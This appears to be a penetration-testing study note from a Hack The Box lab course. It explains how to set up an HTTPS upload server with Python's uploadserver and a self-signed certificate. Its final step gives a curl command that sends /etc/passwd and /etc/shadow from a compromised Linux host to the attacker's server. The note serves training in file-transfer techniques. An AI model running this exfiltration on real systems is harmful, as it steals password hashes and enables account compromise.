# 🌐 Web Upload with HTTPS πŸš€ Securely upload files from a compromised Linux machine using a tool called `uploadserver` β€” a Python module that comes with a built-in file upload page! πŸ“‚πŸ” *** ## 🐍 Step 1: Install `uploadserver` We’ll use Python’s pip tool to install `uploadserver` locally on our box (Pwnbox in this case): ```bash z3tssu@htb[/htb]$ sudo python3 -m pip install --user uploadserver ``` ### πŸ“¦ You should see something like: ``` Collecting uploadserver Successfully installed uploadserver-2.0.1 ``` βœ… Boom! It's installed! *** ## πŸ” Step 2: Create a Self-Signed Certificate πŸ§ΎπŸ”’ We need a certificate for HTTPS. Here's how to create a quick self-signed one: {% code overflow="wrap" %} ```bash z3tssu@htb[/htb]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' ``` {% endcode %} πŸ’‘ This generates a certificate and key, both saved in `server.pem`. *** ## πŸ—‚οΈ Step 3: Create a Folder for Your Web Server Let’s keep things tidy by making a directory to serve the files from: ```bash z3tssu@htb[/htb]$ mkdir https && cd https ``` *** ## πŸš€ Step 4: Launch the Web Server with HTTPS Now, run `uploadserver` using your certificate on port 443 (HTTPS): ```bash z3tssu@htb[/htb]$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem ``` ### 🌍 You should see: ``` File upload available at /upload Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ... ``` *** ## πŸ“€ Step 5: Upload Files from the Target Machine πŸ’»βž‘οΈπŸŒ From the compromised Linux machine, let’s upload two sensitive files: ```bash curl -X POST https://192.168.49.128/upload \ -F 'files=@/etc/passwd' \ -F 'files=@/etc/shadow' \ --insecure ``` ⚠️ Why `--insecure`?\ Because we’re using a **self-signed** cert that isn't trusted by default. But it’s okay here β€” *we trust it* 😎. ***